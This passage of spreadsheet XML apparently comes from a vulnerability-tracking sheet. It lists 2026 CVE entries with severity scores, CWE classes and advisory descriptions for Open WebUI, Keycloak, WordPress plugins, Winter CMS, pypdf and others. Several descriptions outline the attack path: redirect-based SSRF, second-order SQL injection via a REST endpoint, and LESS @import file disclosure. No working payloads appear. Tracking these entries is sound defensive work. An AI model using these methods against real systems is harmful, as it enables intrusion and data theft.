      <c r="M1063" s="5" t="inlineStr">
        <is>
          <t>0.11.1</t>
        </is>
      </c>
      <c r="N1063" s="5" t="inlineStr">
        <is>
          <t>GHSA, NVD, OSV</t>
        </is>
      </c>
      <c r="O1063" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1063" s="5" t="inlineStr"/>
      <c r="Q1063" s="5" t="inlineStr">
        <is>
          <t>CWE-918</t>
        </is>
      </c>
      <c r="R1063" s="5" t="inlineStr">
        <is>
          <t>Open WebUI is an extensible, feature-rich, and user-friendly self-hosted AI platform. From 0.9.5 until 0.11.1, server-side web fetches did not reapply WEB_FETCH_FILTER_LIST or private-address controls to HTTP redirect destinations when AIOHTTP_CLIENT_ALLOW_REDIRECTS was enabled. An authenticated user could redirect the aiohttp and requests fetch paths to excluded hosts, loopback, private networks, or cloud metadata services and route resulting content into web search, URL ingestion, page-fetch tools, or chat image processing. This issue is fixed in version 0.11.1.</t>
        </is>
      </c>
      <c r="S1063" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88001</t>
        </is>
      </c>
    </row>
    <row r="1064">
      <c r="A1064" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1064" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1064" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19729</t>
        </is>
      </c>
      <c r="D1064" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E1064" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1064" s="5" t="inlineStr">
        <is>
          <t>secalert@redhat.com</t>
        </is>
      </c>
      <c r="G1064" s="5" t="inlineStr"/>
      <c r="H1064" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I1064" s="5" t="inlineStr"/>
      <c r="J1064" s="5" t="inlineStr">
        <is>
          <t>keycloak</t>
        </is>
      </c>
      <c r="K1064" s="5" t="inlineStr"/>
      <c r="L1064" s="5" t="inlineStr"/>
      <c r="M1064" s="5" t="inlineStr"/>
      <c r="N1064" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1064" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1064" s="5" t="inlineStr"/>
      <c r="Q1064" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R1064" s="5" t="inlineStr">
        <is>
          <t>A flaw was found in the key provider component of the keycloak-services library, which is the core engine for the Red Hat Build of Keycloak. The issue occurs because a previous fix for path probing was incomplete, allowing a realm administrator to still submit arbitrary filesystem paths as keystore parameters. This can be used to determine the existence and readability of files on the server, potentially exposing sensitive system information.</t>
        </is>
      </c>
      <c r="S1064" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19729</t>
        </is>
      </c>
    </row>
    <row r="1065">
      <c r="A1065" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1065" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1065" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19800</t>
        </is>
      </c>
      <c r="D1065" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E1065" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1065" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G1065" s="5" t="inlineStr"/>
      <c r="H1065" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1065" s="5" t="inlineStr"/>
      <c r="J1065" s="5" t="inlineStr"/>
      <c r="K1065" s="5" t="inlineStr"/>
      <c r="L1065" s="5" t="inlineStr"/>
      <c r="M1065" s="5" t="inlineStr"/>
      <c r="N1065" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1065" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1065" s="5" t="inlineStr"/>
      <c r="Q1065" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R1065" s="5" t="inlineStr">
        <is>
          <t>The Mail Mint – Email Marketing, Newsletter, Email Automation &amp; WooCommerce Emails plugin for WordPress is vulnerable to SQL Injection via the 'status' parameter in all versions up to, and including, 1.31.0 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. The $wpdb-&gt;prepare() call does not protect against this injection because the attacker-controlled $contact_filter_query fragment is concatenated into the SQL format string before prepare() executes — prepare() only processes %s/%d placeholders and cannot sanitize content already embedded in the format string. REST API JSON bodies are parsed from php://input and bypass WordPress's wp_magic_quotes(), meaning double-quote characters in status array values reach the SQL sink unescaped. This makes it possible for authenticated attackers, with administrator-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. The required 'mint_read_contacts' capability is a plugin-specific capability not assigned to any default WordPress role; it must be explicitly granted by an administrator, making this effectively an Administrator+ vulnerability.</t>
        </is>
      </c>
      <c r="S1065" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19800</t>
        </is>
      </c>
    </row>
    <row r="1066">
      <c r="A1066" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1066" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1066" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19944</t>
        </is>
      </c>
      <c r="D1066" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E1066" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1066" s="5" t="inlineStr">
        <is>
          <t>security@wordfence.com</t>
        </is>
      </c>
      <c r="G1066" s="5" t="inlineStr"/>
      <c r="H1066" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1066" s="5" t="inlineStr"/>
      <c r="J1066" s="5" t="inlineStr"/>
      <c r="K1066" s="5" t="inlineStr"/>
      <c r="L1066" s="5" t="inlineStr"/>
      <c r="M1066" s="5" t="inlineStr"/>
      <c r="N1066" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1066" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1066" s="5" t="inlineStr"/>
      <c r="Q1066" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="R1066" s="5" t="inlineStr">
        <is>
          <t>The WP Crowdfunding plugin for WordPress is vulnerable to generic SQL Injection via 'wpneo_reward' Post Meta in all versions up to, and including, 2.2.1 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with shop manager-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database. This is a second-order injection: a Shop Manager writes the malicious payload once via the WooCommerce REST products endpoint (POST/PUT /wp-json/wc/v3/products/{id}), and the injected query executes on every subsequent public page view that renders the campaign rewards sidebar.</t>
        </is>
      </c>
      <c r="S1066" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19944</t>
        </is>
      </c>
    </row>
    <row r="1067">
      <c r="A1067" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1067" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1067" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-52832</t>
        </is>
      </c>
      <c r="D1067" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E1067" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1067" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1067" s="5" t="inlineStr"/>
      <c r="H1067" s="5" t="n">
        <v>0.005</v>
      </c>
      <c r="I1067" s="5" t="inlineStr"/>
      <c r="J1067" s="5" t="inlineStr"/>
      <c r="K1067" s="5" t="inlineStr"/>
      <c r="L1067" s="5" t="inlineStr"/>
      <c r="M1067" s="5" t="inlineStr"/>
      <c r="N1067" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1067" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P1067" s="5" t="inlineStr"/>
      <c r="Q1067" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R1067" s="5" t="inlineStr">
        <is>
          <t>Nuclio is a "Serverless" framework for Real-Time Events and Data Processing. Prior to version 1.16.5, Nuclio Dashboard exposes POST /api/functions without authentication by default (NOP auth mode). The spec.handler field (e.g., mymodule:myfunction) is parsed by functionconfig.ParseHandler() which splits on : only — no path validation is applied to the module portion. This issue has been patched in version 1.16.5.</t>
        </is>
      </c>
      <c r="S1067" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-52832</t>
        </is>
      </c>
    </row>
    <row r="1068">
      <c r="A1068" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1068" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1068" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-63179</t>
        </is>
      </c>
      <c r="D1068" s="5" t="n">
        <v>4.9</v>
      </c>
      <c r="E1068" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1068" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1068" s="5" t="inlineStr"/>
      <c r="H1068" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="I1068" s="5" t="inlineStr"/>
      <c r="J1068" s="5" t="inlineStr"/>
      <c r="K1068" s="5" t="inlineStr"/>
      <c r="L1068" s="5" t="inlineStr"/>
      <c r="M1068" s="5" t="inlineStr"/>
      <c r="N1068" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1068" s="5" t="inlineStr">
        <is>
          <t>2026-08-26</t>
        </is>
      </c>
      <c r="P1068" s="5" t="inlineStr"/>
      <c r="Q1068" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="R1068" s="5" t="inlineStr">
        <is>
          <t>Winter CMS is a content management system built on the Laravel PHP framework. In versions up to and including 1.2.12, authenticated backend users can disclose arbitrary files readable by the PHP process by injecting @import (inline) directives into LESS source that the backend compiles, because the LESS parser was instantiated without a safe import resolver and fell back to the raw attacker-supplied path when no allowed root matched. The flaw is reachable through four entry points that share the same root cause: the Brand Settings custom_css field, the Editor Settings html_custom_styles field, the Mail Brand Settings colour-picker fields whose values are concatenated into LESS source without escaping, and theme .less, .sass, and .scss assets compiled when served. Both absolute paths and .. traversal outside the asset's own tree were accepted, so an attacker could read any file the web process can access, most significantly the application .env file and the APP_KEY and database credentials it contains. Exploitation requires a backend account holding one of the associated permissions, which are assigned by default to the built-in Developer role. This issue is fixed in version 1.2.13.</t>
        </is>
      </c>
      <c r="S1068" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-63179</t>
        </is>
      </c>
    </row>
    <row r="1069">
      <c r="A1069" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1069" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1069" s="5" t="inlineStr">
        <is>
          <t>CVE-2025-3271</t>
        </is>
      </c>
      <c r="D1069" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E1069" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1069" s="5" t="inlineStr">
        <is>
          <t>security@opentext.com</t>
        </is>
      </c>
      <c r="G1069" s="5" t="inlineStr"/>
      <c r="H1069" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1069" s="5" t="inlineStr"/>
      <c r="J1069" s="5" t="inlineStr"/>
      <c r="K1069" s="5" t="inlineStr"/>
      <c r="L1069" s="5" t="inlineStr"/>
      <c r="M1069" s="5" t="inlineStr"/>
      <c r="N1069" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1069" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1069" s="5" t="inlineStr"/>
      <c r="Q1069" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1069" s="5" t="inlineStr">
        <is>
          <t>Documentum Webtop versions prior to 16.7.1 software is vulnerable to an XSS</t>
        </is>
      </c>
      <c r="S1069" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2025-3271</t>
        </is>
      </c>
    </row>
    <row r="1070">
      <c r="A1070" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1070" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1070" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21086</t>
        </is>
      </c>
      <c r="D1070" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E1070" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1070" s="5" t="inlineStr">
        <is>
          <t>mobile.security@samsung.com</t>
        </is>
      </c>
      <c r="G1070" s="5" t="inlineStr"/>
      <c r="H1070" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1070" s="5" t="inlineStr"/>
      <c r="J1070" s="5" t="inlineStr"/>
      <c r="K1070" s="5" t="inlineStr"/>
      <c r="L1070" s="5" t="inlineStr"/>
      <c r="M1070" s="5" t="inlineStr"/>
      <c r="N1070" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1070" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1070" s="5" t="inlineStr"/>
      <c r="Q1070" s="5" t="inlineStr">
        <is>
          <t>CWE-20</t>
        </is>
      </c>
      <c r="R1070" s="5" t="inlineStr">
        <is>
          <t>Improper authorization in ProxyHandler prior to SMR Aug-2026 Release 1 allows local attackers to access proxy configuration.</t>
        </is>
      </c>
      <c r="S1070" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21086</t>
        </is>
      </c>
    </row>
    <row r="1071">
      <c r="A1071" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1071" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1071" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-21113</t>
        </is>
      </c>
      <c r="D1071" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E1071" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1071" s="5" t="inlineStr">
        <is>
          <t>mobile.security@samsung.com</t>
        </is>
      </c>
      <c r="G1071" s="5" t="inlineStr"/>
      <c r="H1071" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1071" s="5" t="inlineStr"/>
      <c r="J1071" s="5" t="inlineStr"/>
      <c r="K1071" s="5" t="inlineStr"/>
      <c r="L1071" s="5" t="inlineStr"/>
      <c r="M1071" s="5" t="inlineStr"/>
      <c r="N1071" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1071" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1071" s="5" t="inlineStr"/>
      <c r="Q1071" s="5" t="inlineStr">
        <is>
          <t>CWE-926</t>
        </is>
      </c>
      <c r="R1071" s="5" t="inlineStr">
        <is>
          <t>Improper export of android application components in Visual Voicemail prior to version 20.1.00.05 allows local attackers to initiate call without proper permission.</t>
        </is>
      </c>
      <c r="S1071" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-21113</t>
        </is>
      </c>
    </row>
    <row r="1072">
      <c r="A1072" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1072" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1072" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-49309</t>
        </is>
      </c>
      <c r="D1072" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E1072" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1072" s="5" t="inlineStr">
        <is>
          <t>psirt@huawei.com</t>
        </is>
      </c>
      <c r="G1072" s="5" t="inlineStr"/>
      <c r="H1072" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1072" s="5" t="inlineStr"/>
      <c r="J1072" s="5" t="inlineStr"/>
      <c r="K1072" s="5" t="inlineStr"/>
      <c r="L1072" s="5" t="inlineStr"/>
      <c r="M1072" s="5" t="inlineStr"/>
      <c r="N1072" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1072" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1072" s="5" t="inlineStr"/>
      <c r="Q1072" s="5" t="inlineStr">
        <is>
          <t>CWE-264</t>
        </is>
      </c>
      <c r="R1072" s="5" t="inlineStr">
        <is>
          <t>Permission control vulnerability in the Settings module.
Impact: Successful exploitation of this vulnerability may affect service confidentiality.</t>
        </is>
      </c>
      <c r="S1072" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-49309</t>
        </is>
      </c>
    </row>
    <row r="1073">
      <c r="A1073" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1073" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1073" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-53529</t>
        </is>
      </c>
      <c r="D1073" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E1073" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1073" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1073" s="5" t="inlineStr"/>
      <c r="H1073" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1073" s="5" t="inlineStr"/>
      <c r="J1073" s="5" t="inlineStr"/>
      <c r="K1073" s="5" t="inlineStr"/>
      <c r="L1073" s="5" t="inlineStr"/>
      <c r="M1073" s="5" t="inlineStr"/>
      <c r="N1073" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1073" s="5" t="inlineStr">
        <is>
          <t>2026-08-21</t>
        </is>
      </c>
      <c r="P1073" s="5" t="inlineStr"/>
      <c r="Q1073" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1073" s="5" t="inlineStr">
        <is>
          <t>LeafWiki is a self-hosted wiki. Prior to version 0.10.2, page titles returned by the search API could be rendered as raw HTML in the frontend. A user with editor or administrator permissions could create or modify a page title containing an HTML/JavaScript payload. When another user searched for a matching term, the payload could execute in the victim’s browser. The impact depends on deployment configuration. With `--public-access` enabled, unauthenticated visitors could be affected. In authenticated-only deployments, the issue could be used for cross-user XSS against logged-in users who can access search results. The issue has been fixed in version 0.10.2 by ensuring that author-controlled page titles in search results are not interpreted as raw HTML by the browser while preserving search result highlighting.</t>
        </is>
      </c>
      <c r="S1073" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-53529</t>
        </is>
      </c>
    </row>
    <row r="1074">
      <c r="A1074" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1074" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1074" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-77506</t>
        </is>
      </c>
      <c r="D1074" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E1074" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1074" s="5" t="inlineStr">
        <is>
          <t>cve@mitre.org</t>
        </is>
      </c>
      <c r="G1074" s="5" t="inlineStr"/>
      <c r="H1074" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="I1074" s="5" t="inlineStr"/>
      <c r="J1074" s="5" t="inlineStr"/>
      <c r="K1074" s="5" t="inlineStr"/>
      <c r="L1074" s="5" t="inlineStr"/>
      <c r="M1074" s="5" t="inlineStr"/>
      <c r="N1074" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1074" s="5" t="inlineStr">
        <is>
          <t>2026-08-20</t>
        </is>
      </c>
      <c r="P1074" s="5" t="inlineStr"/>
      <c r="Q1074" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1074" s="5" t="inlineStr">
        <is>
          <t>Znuny before LTS 6.5.22 allows AgentTicketEmailResend template XSS.</t>
        </is>
      </c>
      <c r="S1074" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-77506</t>
        </is>
      </c>
    </row>
    <row r="1075">
      <c r="A1075" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1075" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1075" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-80440</t>
        </is>
      </c>
      <c r="D1075" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E1075" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1075" s="5" t="inlineStr">
        <is>
          <t>contact@wpscan.com</t>
        </is>
      </c>
      <c r="G1075" s="5" t="inlineStr"/>
      <c r="H1075" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1075" s="5" t="inlineStr"/>
      <c r="J1075" s="5" t="inlineStr"/>
      <c r="K1075" s="5" t="inlineStr"/>
      <c r="L1075" s="5" t="inlineStr"/>
      <c r="M1075" s="5" t="inlineStr"/>
      <c r="N1075" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1075" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="P1075" s="5" t="inlineStr"/>
      <c r="Q1075" s="5" t="inlineStr">
        <is>
          <t>CWE-74</t>
        </is>
      </c>
      <c r="R1075" s="5" t="inlineStr">
        <is>
          <t>The Hustle WordPress plugin before 7.8.14.2 does not prevent shortcodes in submitted form values from being executed when it substitutes those values into the message it returns after submission, because the guard it applies can be defeated by nesting, allowing unauthenticated users to run any shortcode registered on the site.</t>
        </is>
      </c>
      <c r="S1075" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-80440</t>
        </is>
      </c>
    </row>
    <row r="1076">
      <c r="A1076" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1076" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1076" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81167</t>
        </is>
      </c>
      <c r="D1076" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E1076" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1076" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1076" s="5" t="inlineStr"/>
      <c r="H1076" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="I1076" s="5" t="inlineStr"/>
      <c r="J1076" s="5" t="inlineStr"/>
      <c r="K1076" s="5" t="inlineStr">
        <is>
          <t>address_suggestion_project:address_suggestion</t>
        </is>
      </c>
      <c r="L1076" s="5" t="inlineStr"/>
      <c r="M1076" s="5" t="inlineStr"/>
      <c r="N1076" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1076" s="5" t="inlineStr">
        <is>
          <t>2026-09-02</t>
        </is>
      </c>
      <c r="P1076" s="5" t="inlineStr"/>
      <c r="Q1076" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="R1076" s="5" t="inlineStr">
        <is>
          <t>Improper Neutralization of Input During Web Page Generation ("Cross-site Scripting") vulnerability in Drupal Address Suggestion allows Cross-Site Scripting (XSS). This issue affects Address Suggestion versions: from 0.0.0 to 1.0.25.</t>
        </is>
      </c>
      <c r="S1076" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81167</t>
        </is>
      </c>
    </row>
    <row r="1077">
      <c r="A1077" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1077" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1077" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84310</t>
        </is>
      </c>
      <c r="D1077" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E1077" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1077" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1077" s="5" t="inlineStr"/>
      <c r="H1077" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1077" s="5" t="inlineStr"/>
      <c r="J1077" s="5" t="inlineStr"/>
      <c r="K1077" s="5" t="inlineStr"/>
      <c r="L1077" s="5" t="inlineStr"/>
      <c r="M1077" s="5" t="inlineStr"/>
      <c r="N1077" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1077" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P1077" s="5" t="inlineStr"/>
      <c r="Q1077" s="5" t="inlineStr">
        <is>
          <t>CWE-405, CWE-834</t>
        </is>
      </c>
      <c r="R1077" s="5" t="inlineStr">
        <is>
          <t>pypdf is a free and open-source pure-python PDF library. Prior to 6.16.1, an attacker can craft a PDF that causes pypdf/_doc_common.py _get_outline to consume long runtimes and large amounts of memory when retrieving document outlines with large numbers of entries or deeply nested reused paths because the traversal lacked global entry-count and nesting-depth limits. This issue is fixed in version 6.16.1.</t>
        </is>
      </c>
      <c r="S1077" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84310</t>
        </is>
      </c>
    </row>
    <row r="1078">
      <c r="A1078" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1078" s="5" t="inlineStr">
        <is>
          <t>Newly scored</t>
        </is>
      </c>
      <c r="C1078" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84311</t>
        </is>
      </c>
      <c r="D1078" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E1078" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1078" s="5" t="inlineStr">
        <is>
          <t>security-advisories@github.com</t>
        </is>
      </c>
      <c r="G1078" s="5" t="inlineStr"/>
      <c r="H1078" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="I1078" s="5" t="inlineStr"/>
      <c r="J1078" s="5" t="inlineStr"/>
      <c r="K1078" s="5" t="inlineStr"/>
      <c r="L1078" s="5" t="inlineStr"/>
      <c r="M1078" s="5" t="inlineStr"/>
      <c r="N1078" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O1078" s="5" t="inlineStr">
        <is>
          <t>2026-09-01</t>
        </is>
      </c>
      <c r="P1078" s="5" t="inlineStr"/>
      <c r="Q1078" s="5" t="inlineStr">
        <is>
          <t>CWE-834</t>
        </is>
      </c>
      <c r="R1078" s="5" t="inlineStr">
        <is>
          <t>pypdf is a free and open-source pure-python PDF library. Prior to 6.16.1, an attacker can craft a PDF that causes pypdf/_page.py PageObject._extract_text and PageObject.extract_xform_text to traverse a directed acyclic graph of reused form XObjects in which each form invokes a child multiple times, creating exponentially many traversal paths and causing long runtimes and large memory consumption. This issue is fixed in version 6.16.1.</t>
        </is>
      </c>
      <c r="S1078" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84311</t>
        </is>
      </c>
    </row>
    <row r="1079">
      <c r="A1079" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1079" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C1079" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-87463</t>
        </is>
      </c>
      <c r="D1079" s="5" t="n">
        <v>4.8</v>
      </c>
      <c r="E1079" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="F1079" s="5" t="inlineStr">
        <is>
          <t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t>
        </is>
      </c>
      <c r="G1079" s="5" t="inlineStr"/>
